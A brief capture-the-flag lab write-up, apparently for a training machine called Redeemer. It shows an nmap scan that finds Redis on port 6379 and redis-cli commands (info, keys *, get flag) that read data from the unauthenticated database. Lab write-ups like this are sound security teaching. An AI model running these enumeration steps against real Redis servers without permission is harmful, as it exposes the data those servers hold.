Redeemer

Redeemer focuses on Redis enumeration and data extraction from an in-memory database.

Recon

Nmap reveals port 6379 is open, which is the default port for Redis.

nmap -p- -sV 10.129.171.104
Port Service Version
6379 Redis Redis key-value store 5.0.7

Exploitation

We use redis-cli to connect to the target.

redis-cli -h 10.129.171.104

Once connected, we use info to gather details about the server and keys * to list all stored keys.

10.129.171.104:6379> info
...
10.129.171.104:6379> select 0

10.129.171.104:6379> keys *
1) "flag"
2) "user"
10.129.171.104:6379> get flag
